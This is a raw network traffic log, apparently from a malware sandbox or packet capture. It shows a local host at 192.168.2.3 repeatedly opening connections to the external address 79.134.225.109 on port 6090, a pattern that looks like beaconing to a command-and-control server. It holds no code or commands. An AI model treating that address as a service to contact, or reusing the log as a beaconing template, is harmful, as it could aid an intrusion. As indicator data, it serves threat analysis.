Apr 1, 2021 17:45:45.414813042 CEST	6090	49868	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:45.527287006 CEST	49869	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:45.637902021 CEST	6090	49869	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:46.151602030 CEST	49869	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:46.263032913 CEST	6090	49869	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:46.776102066 CEST	49869	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:46.886640072 CEST	6090	49869	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:46.996640921 CEST	49871	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:47.104542971 CEST	6090	49871	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:47.619945049 CEST	49871	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:47.726149082 CEST	6090	49871	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:48.229271889 CEST	49871	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:48.335268021 CEST	6090	49871	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:48.449510098 CEST	49872	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:48.555572033 CEST	6090	49872	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:49.057528019 CEST	49872	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:49.165107965 CEST	6090	49872	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:49.666892052 CEST	49872	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:49.773592949 CEST	6090	49872	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:49.886945963 CEST	49874	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:49.995287895 CEST	6090	49874	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:50.510710001 CEST	49874	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:50.622042894 CEST	6090	49874	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:51.135689020 CEST	49874	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:51.241321087 CEST	6090	49874	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:51.357011080 CEST	49875	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:51.466129065 CEST	6090	49875	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:51.979568005 CEST	49875	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:52.095999002 CEST	6090	49875	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:52.604590893 CEST	49875	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:52.713485956 CEST	6090	49875	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:53.880203009 CEST	49876	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:53.989023924 CEST	6090	49876	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:54.495369911 CEST	49876	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:54.600713968 CEST	6090	49876	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:55.104912043 CEST	49876	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:55.213668108 CEST	6090	49876	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:55.325265884 CEST	49877	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:55.433013916 CEST	6090	49877	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:55.948689938 CEST	49877	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:56.058834076 CEST	6090	49877	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:56.573719978 CEST	49877	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:56.682579994 CEST	6090	49877	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:56.794996023 CEST	49880	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:56.901103973 CEST	6090	49880	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:57.401887894 CEST	49880	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:57.509573936 CEST	6090	49880	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:58.011327982 CEST	49880	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:58.117180109 CEST	6090	49880	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:58.233164072 CEST	49881	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:58.339057922 CEST	6090	49881	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:58.839531898 CEST	49881	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:58.945311069 CEST	6090	49881	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:59.448949099 CEST	49881	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:59.554619074 CEST	6090	49881	79.134.225.109	192.168.2.3
Apr 1, 2021 17:45:59.669253111 CEST	49882	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:45:59.778740883 CEST	6090	49882	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:00.292783022 CEST	49882	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:00.401019096 CEST	6090	49882	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:00.902286053 CEST	49882	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:01.010915041 CEST	6090	49882	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:01.123362064 CEST	49883	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:01.229151964 CEST	6090	49883	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:01.730428934 CEST	49883	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:01.835146904 CEST	6090	49883	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:02.339907885 CEST	49883	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:02.444394112 CEST	6090	49883	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:02.561239004 CEST	49884	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:02.670407057 CEST	6090	49884	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:03.183809996 CEST	49884	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:03.288927078 CEST	6090	49884	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:03.793189049 CEST	49884	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:03.900760889 CEST	6090	49884	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:04.013880014 CEST	49885	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:04.120827913 CEST	6090	49885	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:04.621239901 CEST	49885	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:04.728504896 CEST	6090	49885	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:05.230731964 CEST	49885	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:05.336343050 CEST	6090	49885	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:05.451643944 CEST	49886	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:05.557955980 CEST	6090	49886	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:06.058969975 CEST	49886	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:06.163781881 CEST	6090	49886	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:06.668394089 CEST	49886	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:06.774883032 CEST	6090	49886	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:06.889312029 CEST	49887	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:06.996201038 CEST	6090	49887	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:07.496598005 CEST	49887	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:07.604281902 CEST	6090	49887	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:08.105896950 CEST	49887	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:08.211803913 CEST	6090	49887	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:08.327111959 CEST	49888	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:08.436817884 CEST	6090	49888	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:08.949771881 CEST	49888	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:09.054733992 CEST	6090	49888	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:09.559163094 CEST	49888	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:09.664681911 CEST	6090	49888	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:09.779319048 CEST	49889	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:09.885518074 CEST	6090	49889	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:10.402940989 CEST	49889	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:10.508277893 CEST	6090	49889	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:11.023114920 CEST	49889	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:11.128803015 CEST	6090	49889	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:12.189606905 CEST	49890	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:12.300003052 CEST	6090	49890	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:12.809365988 CEST	49890	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:12.918803930 CEST	6090	49890	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:13.434530973 CEST	49890	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:13.545835972 CEST	6090	49890	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:13.655730963 CEST	49891	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:13.760534048 CEST	6090	49891	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:14.262907982 CEST	49891	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:14.368122101 CEST	6090	49891	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:14.872282028 CEST	49891	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:14.977574110 CEST	6090	49891	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:15.093080044 CEST	49892	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:15.198321104 CEST	6090	49892	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:15.700484037 CEST	49892	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:15.806405067 CEST	6090	49892	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:16.309798956 CEST	49892	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:16.416043043 CEST	6090	49892	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:16.531759977 CEST	49893	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:16.636825085 CEST	6090	49893	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:17.138992071 CEST	49893	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:17.244621038 CEST	6090	49893	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:17.747509003 CEST	49893	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:17.853132963 CEST	6090	49893	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:17.968316078 CEST	49894	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:18.074147940 CEST	6090	49894	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:18.575803041 CEST	49894	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:18.681277037 CEST	6090	49894	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:19.185009956 CEST	49894	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:19.290338993 CEST	6090	49894	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:19.406203032 CEST	49895	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:19.513228893 CEST	6090	49895	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:20.028830051 CEST	49895	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:20.133975983 CEST	6090	49895	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:20.638259888 CEST	49895	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:20.744127989 CEST	6090	49895	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:20.859447002 CEST	49896	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:20.965415955 CEST	6090	49896	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:21.466408014 CEST	49896	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:21.573205948 CEST	6090	49896	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:22.076147079 CEST	49896	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:22.181037903 CEST	6090	49896	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:22.296726942 CEST	49897	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:22.405719042 CEST	6090	49897	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:22.919699907 CEST	49897	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:23.027972937 CEST	6090	49897	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:23.529839993 CEST	49897	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:23.638596058 CEST	6090	49897	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:23.749694109 CEST	49898	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:23.857991934 CEST	6090	49898	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:24.372901917 CEST	49898	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:24.477653027 CEST	6090	49898	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:24.982296944 CEST	49898	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:25.090825081 CEST	6090	49898	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:25.202990055 CEST	49899	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:25.316080093 CEST	6090	49899	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:25.826153994 CEST	49899	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:25.935976982 CEST	6090	49899	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:26.451242924 CEST	49899	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:26.559891939 CEST	6090	49899	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:26.672010899 CEST	49900	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:26.780431032 CEST	6090	49900	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:27.295034885 CEST	49900	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:27.404139042 CEST	6090	49900	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:27.920032978 CEST	49900	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:28.036407948 CEST	6090	49900	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:28.146822929 CEST	49901	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:28.254460096 CEST	6090	49901	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:28.764285088 CEST	49901	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:28.872690916 CEST	6090	49901	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:29.374504089 CEST	49901	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:29.482419014 CEST	6090	49901	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:29.593624115 CEST	49902	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:29.703197002 CEST	6090	49902	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:30.217211008 CEST	49902	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:30.322278976 CEST	6090	49902	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:30.826747894 CEST	49902	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:30.936024904 CEST	6090	49902	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:31.047139883 CEST	49903	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:31.157638073 CEST	6090	49903	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:31.670382977 CEST	49903	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:31.779797077 CEST	6090	49903	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:32.295515060 CEST	49903	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:32.407563925 CEST	6090	49903	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:32.516283989 CEST	49904	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:32.623728037 CEST	6090	49904	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:33.139303923 CEST	49904	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:33.245647907 CEST	6090	49904	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:33.748769045 CEST	49904	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:33.854867935 CEST	6090	49904	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:33.970396996 CEST	49905	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:34.078974009 CEST	6090	49905	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:34.592489004 CEST	49905	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:34.701145887 CEST	6090	49905	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:35.202521086 CEST	49905	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:35.310305119 CEST	6090	49905	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:35.422938108 CEST	49906	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:35.531440973 CEST	6090	49906	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:36.045928955 CEST	49906	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:36.151798964 CEST	6090	49906	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:36.655513048 CEST	49906	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:36.763617039 CEST	6090	49906	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:36.877223015 CEST	49907	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:36.983921051 CEST	6090	49907	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:37.499067068 CEST	49907	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:37.603877068 CEST	6090	49907	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:38.108417034 CEST	49907	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:38.214695930 CEST	6090	49907	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:38.330909967 CEST	49908	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:38.438370943 CEST	6090	49908	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:38.953510046 CEST	49908	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:39.058584929 CEST	6090	49908	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:39.577387094 CEST	49908	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:39.685487032 CEST	6090	49908	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:39.798243999 CEST	49909	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:39.904356003 CEST	6090	49909	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:40.405493021 CEST	49909	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:40.510447025 CEST	6090	49909	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:41.015324116 CEST	49909	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:41.121006012 CEST	6090	49909	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:41.235651016 CEST	49910	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:41.346146107 CEST	6090	49910	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:41.858762026 CEST	49910	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:41.967261076 CEST	6090	49910	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:42.468250036 CEST	49910	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:42.576776028 CEST	6090	49910	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:42.718949080 CEST	49911	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:42.827495098 CEST	6090	49911	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:43.343206882 CEST	49911	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:43.454613924 CEST	6090	49911	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:43.968229055 CEST	49911	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:44.079790115 CEST	6090	49911	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:44.188432932 CEST	49912	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:44.296364069 CEST	6090	49912	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:44.812172890 CEST	49912	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:44.920500040 CEST	6090	49912	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:45.437155008 CEST	49912	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:45.548228979 CEST	6090	49912	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:45.658447027 CEST	49913	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:45.768599033 CEST	6090	49913	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:46.281047106 CEST	49913	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:46.392254114 CEST	6090	49913	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:46.906192064 CEST	49913	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:47.014873981 CEST	6090	49913	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:47.127542973 CEST	49914	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:47.232590914 CEST	6090	49914	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:47.735487938 CEST	49914	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:47.842128038 CEST	6090	49914	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:48.344088078 CEST	49914	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:48.449506044 CEST	6090	49914	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:48.564846039 CEST	49915	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:48.670466900 CEST	6090	49915	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:49.172529936 CEST	49915	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:49.277981043 CEST	6090	49915	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:49.781861067 CEST	49915	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:49.888480902 CEST	6090	49915	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:50.002018929 CEST	49916	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:50.109694958 CEST	6090	49916	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:50.625081062 CEST	49916	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:50.734055042 CEST	6090	49916	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:51.234541893 CEST	49916	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:51.341749907 CEST	6090	49916	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:51.462208986 CEST	49917	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:51.569689989 CEST	6090	49917	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:52.078414917 CEST	49917	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:52.186671019 CEST	6090	49917	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:52.687840939 CEST	49917	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:52.800560951 CEST	6090	49917	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:52.908720970 CEST	49918	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:53.014404058 CEST	6090	49918	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:53.515964031 CEST	49918	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:53.622138977 CEST	6090	49918	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:54.126018047 CEST	49918	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:54.232112885 CEST	6090	49918	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:54.347206116 CEST	49919	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:54.452198029 CEST	6090	49919	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:54.953542948 CEST	49919	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:55.060369968 CEST	6090	49919	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:55.562994003 CEST	49919	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:55.671541929 CEST	6090	49919	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:55.784054041 CEST	49920	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:55.891902924 CEST	6090	49920	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:56.406788111 CEST	49920	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:56.515001059 CEST	6090	49920	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:57.016247034 CEST	49920	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:57.122284889 CEST	6090	49920	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:57.237034082 CEST	49921	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:57.344316006 CEST	6090	49921	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:57.860138893 CEST	49921	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:57.966335058 CEST	6090	49921	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:58.469510078 CEST	49921	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:58.577455044 CEST	6090	49921	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:58.690093994 CEST	49922	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:58.807106972 CEST	6090	49922	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:59.313519955 CEST	49922	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:46:59.423660994 CEST	6090	49922	79.134.225.109	192.168.2.3
Apr 1, 2021 17:46:59.938461065 CEST	49922	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:00.045862913 CEST	6090	49922	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:00.159230947 CEST	49923	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:00.265110970 CEST	6090	49923	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:00.767092943 CEST	49923	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:00.873220921 CEST	6090	49923	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:01.376020908 CEST	49923	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:01.481530905 CEST	6090	49923	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:01.596580982 CEST	49924	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:01.702040911 CEST	6090	49924	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:02.204318047 CEST	49924	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:02.310586929 CEST	6090	49924	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:02.813694954 CEST	49924	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:02.919579029 CEST	6090	49924	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:03.034411907 CEST	49925	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:03.145570040 CEST	6090	49925	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:03.657552004 CEST	49925	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:03.767904997 CEST	6090	49925	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:04.282471895 CEST	49925	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:04.392149925 CEST	6090	49925	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:04.502495050 CEST	49926	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:04.610454082 CEST	6090	49926	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:05.110749006 CEST	49926	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:05.217334032 CEST	6090	49926	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:05.720160961 CEST	49926	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:47:05.827966928 CEST	6090	49926	79.134.225.109	192.168.2.3
Apr 1, 2021 17:47:05.942773104 CEST	49927	6090	192.168.2.3	79.134.225.109
